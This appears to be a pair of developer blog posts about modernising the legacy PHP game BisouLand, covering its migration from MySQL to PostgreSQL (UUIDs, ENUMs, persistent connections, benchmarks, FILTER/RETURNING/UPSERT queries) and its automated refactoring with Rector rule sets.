- $stmt->execute(['auteur' => $id, 'cible' => $cible, 'finaller' => time() + $duree, 'finretour' => time() + 2 * $duree]);
+ $stmt = $pdo->prepare('INSERT INTO attaque (auteur, cible, finaller, finretour, etat) VALUES (:auteur, :cible, :finaller, :finretour, 0)');
+ $stmt->execute(['auteur' => $id, 'cible' => $cible, 'finaller' => $castToPgTimestamptz->fromUnixTimestamp(time() + $duree), 'finretour' => $castToPgTimestamptz->fromUnixTimestamp(time() + 2 * $duree)]);
I love UUIDs. Don't ask me why, I just do.
So it made total sense for me to add something I loved in the love game that is BisouLand:
-- Evolution/construction queue
-- Active construction tasks, INSERT in index.php:427, SELECT/DELETE in index.php:392-409
CREATE TABLE IF NOT EXISTS evolution (
- id SERIAL PRIMARY KEY, -- Task ID for deletion when complete
+ id UUID PRIMARY KEY, -- Task ID (UUIDv7) for deletion when complete
timestamp TIMESTAMPTZ NOT NULL, -- Completion time, checked against time() in index.php:392
classe INTEGER NOT NULL, -- Object class/category for construction
type INTEGER NOT NULL, -- Specific object type within class
- auteur INTEGER NOT NULL, -- User ID who initiated construction, from $id2
+ auteur UUID NOT NULL, -- User ID (foreign key to membres.id) who initiated construction
cout BIGINT NOT NULL -- Cost of the construction task
);
I've been using UUID v4 for a while, which are random generated, but there's a new kid in town: v7, which is still random, but storable by their creation time as the first 48 bits are a UNIX Epoch timestamp.
Of course, I want the client to generate the UUID, not the database, and this can be done thanks to the Symfony Uid component:
+ use Symfony\Uid\Uuid;
// On indique que l'attaque a eu lieu.
- $stmt = $pdo->prepare('INSERT INTO logatt VALUES(:auteur, :cible, :timestamp)');
- $stmt->execute(['auteur' => $idAuteur, 'cible' => $idCible, 'timestamp' => $finaller]);
+ $stmt = $pdo->prepare('INSERT INTO logatt (id, auteur, cible, timestamp) VALUES(:id, :auteur, :cible, :timestamp)');
+ $stmt->execute(['id' => Uuid::v7(), 'auteur' => $idAuteur, 'cible' => $idCible, 'timestamp' => $finaller]);
Oh but hang on, how did we get a Symfony 8 feature in a 2005 LAMP app you ask?
Well it required some tricks, such as renaming index.php to app.php,
and in index.php create the following front controller:
<?php
declare(strict_types=1);
require __DIR__.'/../vendor/autoload.php';
try {
require __DIR__.'/../phpincludes/app.php';
} catch (Throwable $throwable) {
http_response_code(500);
error_log($throwable->getMessage());
echo 'An error occurred';
}
With that, we can now use composer to get third party libraries, see the composer.json:
{
"name": "bl/monolith",
"description": "The original BisouLand codebase",
"type": "project",
"license": "Apache-2.0",
"require": {
"php": ">=8.5",
"ext-curl": "*",
"symfony/uid": "^8.0@rc"
},
"autoload": {
"psr-4": {
"Bl\\": "src/"
},
"files": [
"phpincludes/bd.php",
"phpincludes/cast_to_pg_boolean.php",
"phpincludes/cast_to_unix_timestamp.php",
"phpincludes/cast_to_pg_timestamptz.php",
"phpincludes/fctIndex.php"
]
},
"config": {
"bump-after-update": true,
"sort-packages": true
}
}
Surely, switching from MySQL to PostgreSQL will bring us massive performance boosts, right? Right??
Let's find out with some vanity benchmarks:
# Start fresh
cd apps/monolith
make app-init
BENCH_USER="BisouTest_bench"
BENCH_PASS="SuperSecret123"
# Sign up
curl -X POST 'http://localhost:43000/inscription.html' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d "Ipseudo=${BENCH_USER}&Imdp=${BENCH_PASS}&Imdp2=${BENCH_PASS}&inscription=S%27inscrire"
# Log in
BENCH_COOKIE=$(curl -X POST 'http://localhost:43000/redirect.php' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d "pseudo=${BENCH_USER}&mdp=${BENCH_PASS}&connexion=Se+connecter" \
-i -s | grep -i 'set-cookie: PHPSESSID' | sed 's/.*PHPSESSID=\([^;]*\).*/\1/' | tr -d '\r')
# Test load homepage (not signed in)
ab -l -q -k -c 50 -n 10000 http://localhost:43000/ \
| grep -E "Complete requests|Failed requests|Exception|Requests per second|Time per request.*across"
# Test load Brain page (signed in)
ab -l -q -k -c 50 -n 10000 -C "PHPSESSID=$BENCH_COOKIE" http://localhost:43000/cerveau.html \
| grep -E "Complete requests|Failed requests|Exception|Requests per second|Time per request.*across"
We execute this before the migration (I've kindly upgraded to MySQL 8), and after the migration to PostgreSQL.
On my MacBook M4 (with Docker), the results are as follow:
1503 to 1000.665 to 9.9431133 to 960.883 to 10.348🚨 Performance degradation: 90% slower than MySQL 🙀
How is that possible?? My core beliefs are now completly shattered!!!!111oneoneeleven
Unless... Unless we've missed one important configuration step:
<?php
function bd_connect()
{
static $pdo = null;
if (null === $pdo) {
$dsn = 'pgsql:host='.DATABASE_HOST.';port='.DATABASE_PORT.';dbname='.DATABASE_NAME;
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
PDO::ATTR_EMULATE_PREPARES => false,
// Don't forget to set persistent connections!
PDO::ATTR_PERSISTENT => true,
];
$pdo = new PDO($dsn, DATABASE_USER, DATABASE_PASSWORD, $options);
}
return $pdo;
}
And indeed, we had forgotten to enable persistent connections.
As it turns out, the overhead of setting a new connection with PostgreSQL is quite consequential.
Let's re-run our tests (we make sure MySQL also gets persistent connection):
1683.86 to 1905.430.594 to 0.5251309.55 to 1828.190.764 to 0.547Phew, my mid-life crisis is postponed 😌. PostgreSQL is after all faster than MySQL:
It's great to see that now on the logged in pages, we get the same speed as on on the not logged in ones.
With the persistent connection, it's going to be harder to drop the database, to recreate it. We'll need to first terminate active connections.
Once the database has been dropped, created and the schema loaded, we also need to restart PostgreSQL to clear the connection pool:
#!/usr/bin/env bash
# File: /apps/monolith/bin/db-reset.sh
# ──────────────────────────────────────────────────────────────────────────────
# Database reset:
# * drops the database
# * then recreates it
# * and finally loads the schema
#
# Intended for development and testing purposes.
# ──────────────────────────────────────────────────────────────────────────────
_BIN_DIR="$(dirname "$(readlink -f "${BASH_SOURCE[0]:-$0}")")"
_ROOT_DIR="$(realpath "${_BIN_DIR}/..")"
cd "${_ROOT_DIR}"
# ──────────────────────────────────────────────────────────────────────────────
# Loading database config through environment variables.
# `set -a` enables exportation of env vars, while `set +a` disables it.
# Passing PostgreSQL password via command line arguments is insecure,
# so using `PGPASSWORD` instead.
# ──────────────────────────────────────────────────────────────────────────────
set -a; source .env; set +a
export PGPASSWORD="${DATABASE_PASSWORD}"
# ──────────────────────────────────────────────────────────────────────────────
# Reset the database, through Docker containers.
# ──────────────────────────────────────────────────────────────────────────────
echo ' // 🔌 Terminating active connections...'
echo ''
docker compose exec -e PGPASSWORD db psql \
-U ${DATABASE_USER} \
-d postgres \
-c "SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname = '${DATABASE_NAME}' AND pid <> pg_backend_pid();" \
> /dev/null 2>&1
echo ' // 🗑️ Dropping database...'
echo ''
docker compose exec -e PGPASSWORD db psql \
-U ${DATABASE_USER} \
-d postgres \
-c "DROP DATABASE IF EXISTS ${DATABASE_NAME};" \
> /dev/null 2>&1
echo ' // 🆕 Creating database...'
echo ''
docker compose exec -e PGPASSWORD db psql \
-U ${DATABASE_USER} \
-d postgres \
-c "CREATE DATABASE ${DATABASE_NAME};" \
> /dev/null 2>&1
echo ' // 📋 Loading schema.sql...'
echo ''
docker compose exec -T -e PGPASSWORD db psql \
-U ${DATABASE_USER} \
-d ${DATABASE_NAME} \
> /dev/null 2>&1 \
< schema.sql
echo ' // 🔄 Restarting web container to clear connection pool...'
echo ''
docker compose restart web > /dev/null 2>&1
echo ' [OK] Database reset'
There are actually some other types I've taken advantage of,
like INET and ENUM. But there's not much to say about those apart from
"look, I've replaced attaque.etat SMALLINT (0,1,2) with
attack_state ENUM ('going_to_target', 'coming_back', 'cancelled')":
+ -- Blown kiss state ENUM type
+ CREATE TYPE blown_kiss_state AS ENUM ('EnRoute', 'ComingBack', 'CalledOff');
-- Attack table
-- Active attacks in progress, managed throughout attaque.php and action.php
CREATE TABLE IF NOT EXISTS attaque (
auteur UUID NOT NULL, -- Attacker user ID (foreign key to membres.id), set bloque=1 during attack
cible UUID NOT NULL, -- Target user ID (foreign key to membres.id)
finaller TIMESTAMPTZ NOT NULL, -- Attack arrival timestamp (when units reach target)
finretour TIMESTAMPTZ NOT NULL, -- Return timestamp (when units return home)
- etat SMALLINT NOT NULL DEFAULT 0, -- Attack state: 0=going_to_target, 1=coming_back, 2=cancelled
+ state blown_kiss_state NOT NULL DEFAULT 'EnRoute', -- Blown kiss state ENUM
butin BIGINT DEFAULT 0 -- Loot gained from attack, set after battle
);
I've taken the ENUM opportunity to also introduce a PHP enum:
<?php
declare(strict_types=1);
namespace Bl\Domain\KissBlowing;
/**
* Blown kiss state enum matching PostgreSQL blown_kiss_state type.
*
* Represents the three possible states of a blown kiss mission:
* - EnRoute: Kiss units are traveling to the target
* - ComingBack: Mission completed, units returning with loot
* - CalledOff: Mission was cancelled by the player
*/
enum BlownKissState: string
{
case EnRoute = 'EnRoute';
case ComingBack = 'ComingBack';
case CalledOff = 'CalledOff';
}
Which made some conditions easier to understand:
// // On récupère les infos sur le joueur que l'on attaque.
- $stmt = $pdo->prepare('SELECT cible, finaller, finretour, butin, etat FROM attaque WHERE auteur = :auteur');
+ $stmt = $pdo->prepare('SELECT cible, finaller, finretour, butin, state FROM attaque WHERE auteur = :auteur');
$stmt->execute(['auteur' => $id]);
if ($donnees_info = $stmt->fetch()) {
$stmt2 = $pdo->prepare('SELECT pseudo, nuage, position FROM membres WHERE id = :id');
$stmt2->execute(['id' => $donnees_info['cible']]);
$donnees_info2 = $stmt2->fetch();
$pseudoCible = $donnees_info2['pseudo'];
$nuageCible = $donnees_info2['nuage'];
$positionCible = $donnees_info2['position'];
$finAll = $castToUnixTimestamp->fromPgTimestamptz($donnees_info['finaller']);
$finRet = $castToUnixTimestamp->fromPgTimestamptz($donnees_info['finretour']);
$butinPris = $donnees_info['butin'];
- $etat = $donnees_info['etat'];
+ $state = BlownKissState::from($donnees_info['state']);
- if (isset($_POST['cancelAttaque']) && 0 === $etat) {
+ if (isset($_POST['cancelAttaque']) && BlownKissState::EnRoute === $state) {
$finRet = (2 * time() + $finRet - 2 * $finAll);
$stmt3 = $pdo->prepare("UPDATE attaque SET state = 'CalledOff', finretour = :finretour WHERE auteur = :auteur");
$stmt3->execute(['finretour' => $castToPgTimestamptz->fromUnixTimestamp($finRet), 'auteur' => $id]);
AdminMP($donnees_info['cible'], 'Attaque annulée', "{$pseudo} a annulé son attaque.
Tu n'es plus en danger.");
- $etat = 2; // Update local variable to reflect the change
+ $state = BlownKissState::CalledOff; // Update local variable to reflect the change
}
- if (0 === $etat) {
+ if (BlownKissState::EnRoute === $state) {
?>
Tu vas tenter d'embrasser <strong><?php echo $pseudoCible; ?></strong> sur le nuage <strong><?php echo $nuageCible; ?></strong>
So yeah. There it is.
The eXtreme Legacy (2005 LAMP) app is now migrated from MySQL to PostgreSQL.
It takes advantages of the native PostgreSQL types, such as BOOLEAN, ENUM, INET, TIMESTAMPTZ and UUID, as well as getting a 13% performance boost in the process.
I guess it's time to stop calling it a LAMP app (how about a LAPP app?).
⁉️ What do you mean, "there's a big security vulnerability"?
Still not convinced PostgreSQL is the superior database? Let me change your mind.
FYI, this is after doing the vanity benchmarks, so expect further speed gains.
BisouLand has a Statistics page proudly displaying how many players it has:
$retour = $pdo->query('SELECT SUM( amour ) AS nb FROM membres WHERE confirmation = TRUE');
$pointsAmourTotal = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '5 minutes'");
$connectCinq = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '1 hour'");
$connectHeure = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '12 hours'");
$connectMid = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '24 hours'");
$connectJour = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '48 hours'");
$connect2Jour = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '7 days'");
$connectSemaine = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '30 days'");
$connectMois = $retour->fetchColumn();
$retour = $pdo->query("SELECT COUNT(*) AS nb FROM membres WHERE confirmation=TRUE AND lastconnect >= CURRENT_TIMESTAMP - INTERVAL '1 year'");
$connectAn = $retour->fetchColumn();
We see 9 separate queries. Turns out PostgreSQL can merge them into a single query,
with FILTER:
$stmt = $pdo->query(<<<'SQL'
SELECT
SUM(amour) AS total_love_points,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '5 minutes') AS last_5_min,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '1 hour') AS last_hour,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '12 hours') AS last_12h,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '24 hours') AS last_24h,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '48 hours') AS last_48h,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '7 days') AS last_week,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '30 days') AS last_month,
COUNT(*) FILTER (WHERE lastconnect >= CURRENT_TIMESTAMP - INTERVAL '1 year') AS last_year
FROM membres
WHERE confirmation = TRUE
SQL);
/**
* @var array{
* total_love_points: int|null,
* last_5_min: int,
* last_hour: int,
* last_12h: int,
* last_24h: int,
* last_48h: int,
* last_week: int,
* last_month: int,
* last_year: int,
* } $result
*/
$result = $stmt->fetch();
In the following code snippet, we:
// On effectue la tache dans la table membre.
$stmt2 = $pdo->prepare('SELECT '.$Obj[$classe][$type].', amour FROM membres WHERE id = :id');
$stmt2->execute(['id' => $id2]);
$donnees_info = $stmt2->fetch();
$amourConstructeur = $donnees_info['amour'];
// On récupère l'ancienne valeur.
$nbObjEvol = $donnees_info[$Obj[$classe][$type]];
// On augmente d'un.
++$nbObjEvol;
// On met a jour la table.
$stmt2 = $pdo->prepare('UPDATE membres SET '.$Obj[$classe][$type].' = :nb WHERE id = :id');
$stmt2->execute(['nb' => $nbObjEvol, 'id' => $id2]);
With RETURNING it's possible to directly increment the value in the database and return it:
// On effectue la tache dans la table membre.
$stmt2 = $pdo->prepare(<<<SQL
UPDATE membres
SET {$upgradableItem} = {$upgradableItem} + 1
WHERE id = :account_id
RETURNING amour, {$upgradableItem}
SQL);
$stmt2->execute([
'account_id' => $upgrade['account_id'],
]);
/** @var array<string, int>|false $player */
$player = $stmt2->fetch();
$amourConstructeur = $player['amour'];
// On récupère l'ancienne valeur.
$nbObjEvol = $player[$upgradableItem];
Sometimes we want to either create a new resource, or modify it, which means an extra query to check the existence:
$stmt = $pdo->prepare('SELECT COUNT(*) AS nbre_entrees FROM connectbisous WHERE ip = :ip');
$stmt->execute(['ip' => $_SERVER['REMOTE_ADDR']]);
$donnees = $stmt->fetch();
if (0 == $donnees['nbre_entrees']) { // L'ip ne se trouve pas dans la table, on va l'ajouter
$stmt = $pdo->prepare('INSERT INTO connectbisous VALUES(:ip, :timestamp, 2)');
$stmt->execute(['ip' => $_SERVER['REMOTE_ADDR'], 'timestamp' => time()]);
} else { // L'ip se trouve déjà dans la table, on met juste à jour le timestamp
$stmt = $pdo->prepare('UPDATE connectbisous SET timestamp = :timestamp WHERE ip = :ip');
$stmt->execute(['timestamp' => time(), 'ip' => $_SERVER['REMOTE_ADDR']]);
}
With "UPSERT" (UPdate + inSERT, also possible with MySQL, but different syntax), it's possible to do all this in one single query:
$stmt = $pdo->prepare(<<<'SQL'
INSERT INTO connectbisous (ip, timestamp, type)
VALUES (:ip, CURRENT_TIMESTAMP, 2)
ON CONFLICT (ip) DO UPDATE
SET timestamp = CURRENT_TIMESTAMP
SQL);
$stmt->execute([
'ip' => $_SERVER['REMOTE_ADDR'],
]);
]]>🤘 Behold Rector, the Metamorphosis Overlord, wielding the dark grimoire of AST manipulation to transmute ancient incantations of PHP 5.6 into the blazing runes of PHP 8.x through unholy automated rituals! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can run it locally (http://localhost:43000/), and have some level of automated tests.
But even with a modern PHP version, we still have an eXtreme Legacy spaghetti code...
So let's use Rector to apply some automated refactorings
A question I often get asked is: what's the difference between rector and PHP CS Fixer?
PHP CS Fixer was initially created to automatically fix coding style issues, such as "indentation: 4 spaces vs 1 tab", or "opening curly brace: one the same line vs on a new line", etc.
With time it grew to do more than just fixing coding style issues, like replacing deprecated function calls to their modern counterparts.
But it is a token-based parsing tool (using PHP's token_get_all()),
meaning it looks at the code as a series of keywords (class), whitespaces (),
identifiers (MyClass), punctuations ({), etc,
it's very much a flat array.
This means that there's a limit to how much it can know and understand about the code, and therefore how (and when) to modify it.
For all intent and purposes we should treat PHP CS Fixer as a Coding Style enforcer, even if it can do more than that.
Rector was created to automatically refactor code, such as adding type declarations, simplifying complex control flow, or removing dead code.
With time it grew to do more than just refactoring code, like fixing coding style.
So there is some overlap with PHP CS Fixer,
but Rector is an Abstract Syntax Tree (AST) tool (using PHP Parser),
meaning it holds an structured model of the code (Class object,
with identifier attribute set to MyClass,
collection of Property objects each having a visibility, type and identifier attributes, etc).
This means it can have a deep understanding of the code and therefore how
to modify it in a way that is safe (for example it won't add a string typehint
to a function argument if somewhere in the code a bool is passed to it
or if it's used as an integer inside the function).
Some people know it as the "one off automatic upgrade tool", because it can:
@test annotation with #[Test] attributes)But is is more useful as a "linting" tool that is run on every change made (for example in the CI): once all the deprecated function calls have been replaced with their modern counterparts, you don't want someone reintroducing a deprecated function call by accident.
But coding style and upgrades are secondary features of Rector, its main one is to allow you to define Code Quality rules that are going to be automatically enforced as part of your CI workflow.
Out of the box, rector provides you with Rules as well as rule Sets, let's have a look at what they can do for us.
The Early Return set is a collection of rules that will check if your code can be simplified with earlier return:
Let's enable it in the rector.php config file:
<?php
declare(strict_types=1);
use Rector\Caching\ValueObject\Storage\FileCacheStorage;
use Rector\Config\RectorConfig;
use Rector\Set\ValueObject\SetList;
return RectorConfig::configure()
->withCache(
cacheDirectory: '/tmp/rector',
cacheClass: FileCacheStorage::class,
)
->withPaths([
__DIR__,
__DIR__.'/../monolith',
])
->withSkip([
// —— Excluded paths ———————————————————————————————————————————————————
// [qa]
__DIR__.'/vendor',
// [monolith]
__DIR__.'/../monolith/vendor',
])
->withSets([
// —— PHP ——————————————————————————————————————————————————————————————
SetList::PHP_84,
// —— Core —————————————————————————————————————————————————————————————
SetList::EARLY_RETURN,
])
->withRules([
]);
Now let's run it using:
make rector # ./vendor/bin/rector process
In the BisouLand codebase, this applies the ReturnEarlyIfVariableRector rule:
function calculterAmour($CalAmour, $timeDiff, $LvlCoeur, $nb1, $nb2, $nb3)
{
$CalAmour = calculerGenAmour($CalAmour, $timeDiff, $LvlCoeur, $nb1, $nb2, $nb3);
// Cette fonction ajoute un frein sur le minima.
if ($CalAmour < 0) {
- $CalAmour = 0;
+ return 0;
}
return $CalAmour;
}
As well as the RemoveAlwaysElseRector rule:
// Permet de convertir un timestamp en chaine sous la forme heure:minutes:secondes.
function strTemps($s): string
{
$m = 0;
$h = 0;
if ($s < 0) {
return '0:00:00';
- } else {
- if ($s > 59) {
- $m = floor($s / 60);
- $s = $s - $m * 60;
- }
- if ($m > 59) {
- $h = floor($m / 60);
- $m = $m - $h * 60;
- }
- $ts = $s;
- $tm = $m;
- if ($s < 10) {
- $ts = '0'.$s;
- }
- if ($m < 10) {
- $tm = '0'.$m;
- }
- if ($h > 24) {
- $d = floor($h / 24);
- $h = $h - $d * 24;
- $h = $d.' jours '.$h;
- }
-
- return $h.' h '.$tm.' min '.$ts.' sec';
+ }
+
+ if ($s > 59) {
+ $m = floor($s / 60);
+ $s = $s - $m * 60;
+ }
+
+ if ($m > 59) {
+ $h = floor($m / 60);
+ $m = $m - $h * 60;
+ }
+
+ $ts = $s;
+ $tm = $m;
+ if ($s < 10) {
+ $ts = '0'.$s;
+ }
+
+ if ($m < 10) {
+ $tm = '0'.$m;
+ }
+
+ if ($h > 24) {
+ $d = floor($h / 24);
+ $h = $h - $d * 24;
+ $h = $d.' jours '.$h;
+ }
+
+ return $h.' h '.$tm.' min '.$ts.' sec';
}
The Code Quality rule set includes a whopping 78 rules. I've enabled it as follow:
// Extract from file: rector.php
// [...]
// —— Core —————————————————————————————————————————————————————————————
SetList::CODE_QUALITY,
SetList::EARLY_RETURN,
And after running it on the BisouLand codebase, out of the 78 the following 8 have been applied:
Now let's focus on UseIdenticalOverEqualWithSameTypeRector,
"Use === / !== over == / !=, if values have the same type".
There is similar rule in PHP CS Fixer, strict_comparison, but if we configure that it'll change ALL comparisons in the codebase to strict, whether it's safe to do so or not.
Rector is able to detect the type of variables, so it'll only apply it if it's safe to do so,
for example in nuage.php:
$sautPossible = 0;
// Au moins saut niveau 1.
if ($nbE[2][3] > 0) {
$distance = abs(16 * ($nuageL - $nuageSource) + $i - $positionSource);
// On prend en compte les jambes, et le niveau de saut.
$distMax2 = distanceMax($nbE[0][4], $nbE[2][3]);
if ($distance <= $distMax2) {
$sautPossible = 1;
}
}
- if (1 == $sautPossible) {
+ if (1 === $sautPossible) {
$sautPossible was defined with an integer (should really be a boolean, but whatever),
is potentially (in a if) set to another integer value, so it's safe to strictly
compare it to an integer.
In addition to value assignments ($sautPossible = 0), Rector can know the type
of a variable from the Type Hints of functions they are passed in or that return them.
In eXtreme Legacy applications like BisouLand, we do not have such type Hints, but Rector can add them for us (again only if it knows it's safe to do so), thanks to the 63 rules in the set Type Declaration.
For example NumericReturnTypeFromStrictScalarReturnsRector:
// Fonction qui retourne 0 si joueurAutre est meme niveau, 1 s'il est intouchable parce que trop faible, 2 s'il est intouchable parce que trop fort.
- function voirNiveau($scoreJoueur, $scoreAutre)
+ function voirNiveau($scoreJoueur, $scoreAutre): int
{
if ($scoreJoueur < 50) {
return 2;
}
if ($scoreAutre < 50) {
return 1;
}
if ($scoreJoueur > 2000 && $scoreAutre > 2000) {
return 0;
}
if (abs($scoreAutre - $scoreJoueur) <= 200) {
return 0;
}
if ($scoreJoueur - $scoreAutre > 200) {
return 1;
}
return 2;
}
The advantage of keeping Rector as part of your CI means that as you improve the codebase, some previous rules will be able to be automatically applied again, such as UseIdenticalOverEqualWithSameTypeRector!
Previously in nuage.php, $Niveau's type was considered as mixed, but thanks to the return type hint
Rector now knows it's an integer, and so that it's safe to use strict type comparison:
$Niveau = voirNiveau($scoreSource, $score);
- if (1 == $Niveau) {
+ if (1 === $Niveau) {
if ($score >= 50) {
echo '<a class="bulle" style="cursor: default;color:blue;" onclick="return false;" href=""><strong>',$donnees_info['pseudo'],'</strong><span style="color:blue;">Joueur trop faible</span>';
} else {
echo '<a class="bulle" style="cursor: default;color:teal;" onclick="return false;" href=""><strong>',$donnees_info['pseudo'],'</strong><span style="color:teal;">Joueur ayant moins de 50 points</span>';
}
- } elseif (0 == $Niveau) {
+ } elseif (0 === $Niveau) {
echo '<a class="bulle" style="cursor: default;color:red;" onclick="return false;" href=""><strong>',$donnees_info['pseudo'],'</strong><span style="color:red;">Ce joueur a ton niveau</span>';
Another powerful rule set is Dead Code and its 55 rules.
For example in RemoveAlwaysTrueIfConditionRector,
Rector is able to detect conditions that would always evaluate to true,
and therefore remove the condition check altogether.
In the following snippet, Rector detects that $resultat is always set
because every single code path assigns it a value,
making the isset($resultat) check redundant:
if (isset($_GET['Dnuage'], $_GET['Dpos']) && !empty($_GET['Dnuage']) && !empty($_GET['Dpos'])) {
$Dnuage = htmlentities((string) $_GET['Dnuage']);
$Dpos = htmlentities((string) $_GET['Dpos']);
if ($nbE[0][5] > 0) {
$stmt = $pdo->prepare('SELECT id, oeil, score, pseudo FROM membres WHERE nuage = :nuage AND position = :position');
$stmt->execute(['nuage' => $Dnuage, 'position' => $Dpos]);
if ($donnees = $stmt->fetch()) {
// [...]
if (0 == $Niveau) {
if ($amour >= $cout) {
$resultat = "Tu as dévisagé {$pseudoCible}";
// [...]
} else {
$resultat = "Tu n'as pas assez de Points d'Amour";
}
} else {
$resultat = "Tu n'as pas le même niveau que ce joueur";
}
} else {
$resultat = "Il n'y a plus de joueur a cette position";
}
} else {
$resultat = 'Il te faut des yeux niveau 1 pour dévisager un joueur';
}
?>
<h1>Dévisager</h1>
<br />
<a href="<?php echo $Dnuage; ?>.nuage.html">Retourner sur le nuage en cours</a><br />
<br />
<?php
- if (isset($resultat)) {
- echo '<span class="info">[ '.$resultat.' ]</span><br /><br />';
- }
+ echo '<span class="info">[ '.$resultat.' ]</span><br /><br />';
There are more rule sets, here are the ones that have been configured for BisouLand:
<?php
declare(strict_types=1);
use Rector\Caching\ValueObject\Storage\FileCacheStorage;
use Rector\CodingStyle\Rector\Closure\StaticClosureRector;
use Rector\CodingStyle\Rector\FuncCall\ArraySpreadInsteadOfArrayMergeRector;
use Rector\Config\RectorConfig;
use Rector\PHPUnit\Set\PHPUnitSetList;
use Rector\Set\ValueObject\SetList;
use Rector\TypeDeclarationDocblocks\Rector\Class_\AddReturnDocblockDataProviderRector;
use Rector\TypeDeclarationDocblocks\Rector\Class_\ClassMethodArrayDocblockParamFromLocalCallsRector;
use Rector\TypeDeclarationDocblocks\Rector\Class_\DocblockVarArrayFromGetterReturnRector;
use Rector\TypeDeclarationDocblocks\Rector\Class_\DocblockVarArrayFromPropertyDefaultsRector;
use Rector\TypeDeclarationDocblocks\Rector\Class_\DocblockVarFromParamDocblockInConstructorRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddParamArrayDocblockBasedOnArrayMapRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddParamArrayDocblockFromAssignsParamToParamReferenceRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddParamArrayDocblockFromDataProviderRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddParamArrayDocblockFromDimFetchAccessRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddReturnDocblockForArrayDimAssignedObjectRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddReturnDocblockForCommonObjectDenominatorRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddReturnDocblockForJsonArrayRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\DocblockGetterReturnArrayFromPropertyDocblockVarRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\DocblockReturnArrayFromDirectArrayInstanceRector;
use Rector\Visibility\Rector\ClassConst\ChangeConstantVisibilityRector;
use Rector\Visibility\Rector\ClassMethod\ChangeMethodVisibilityRector;
return RectorConfig::configure()
->withCache(
cacheDirectory: '/tmp/rector',
cacheClass: FileCacheStorage::class,
)
->withPaths([
__DIR__,
__DIR__.'/../monolith',
])
->withSkip([
// —— Excluded paths ———————————————————————————————————————————————————
// Excluded folders
// [qa]
__DIR__.'/vendor',
// [monolith]
__DIR__.'/../monolith/vendor',
// —— Excluded rules ———————————————————————————————————————————————————
// [CODE_QUALITY]
Rector\CodeQuality\Rector\Assign\CombinedAssignRector::class,
// [CODING_STYLE]
Rector\CodingStyle\Rector\Encapsed\EncapsedStringsToSprintfRector::class,
])
->withSets([
// —— PHP ——————————————————————————————————————————————————————————————
SetList::PHP_84,
// —— Core —————————————————————————————————————————————————————————————
SetList::CODE_QUALITY,
SetList::CODING_STYLE,
SetList::DEAD_CODE,
SetList::EARLY_RETURN,
SetList::INSTANCEOF,
SetList::NAMING,
SetList::PRIVATIZATION,
SetList::STRICT_BOOLEANS,
SetList::TYPE_DECLARATION,
// —— PHPUnit ——————————————————————————————————————————————————————————
PHPUnitSetList::PHPUNIT_CODE_QUALITY,
PHPUnitSetList::PHPUNIT_120,
])
->withRules([
// —— Core —————————————————————————————————————————————————————————————
// PHPdoc array types
AddParamArrayDocblockBasedOnArrayMapRector::class,
AddParamArrayDocblockFromAssignsParamToParamReferenceRector::class,
AddParamArrayDocblockFromDataProviderRector::class,
AddParamArrayDocblockFromDimFetchAccessRector::class,
AddReturnDocblockDataProviderRector::class,
AddReturnDocblockForArrayDimAssignedObjectRector::class,
AddReturnDocblockForCommonObjectDenominatorRector::class,
AddReturnDocblockForJsonArrayRector::class,
ClassMethodArrayDocblockParamFromLocalCallsRector::class,
DocblockGetterReturnArrayFromPropertyDocblockVarRector::class,
DocblockReturnArrayFromDirectArrayInstanceRector::class,
DocblockVarArrayFromGetterReturnRector::class,
DocblockVarArrayFromPropertyDefaultsRector::class,
DocblockVarFromParamDocblockInConstructorRector::class,
// Inherit parent visibility
ChangeConstantVisibilityRector::class,
ChangeMethodVisibilityRector::class,
// More Coding Style
ArraySpreadInsteadOfArrayMergeRector::class,
StaticClosureRector::class,
]);
Not all rule sets have been added, for example we are missing:
There are also some rules from added rulesets that we have decided to exclude:
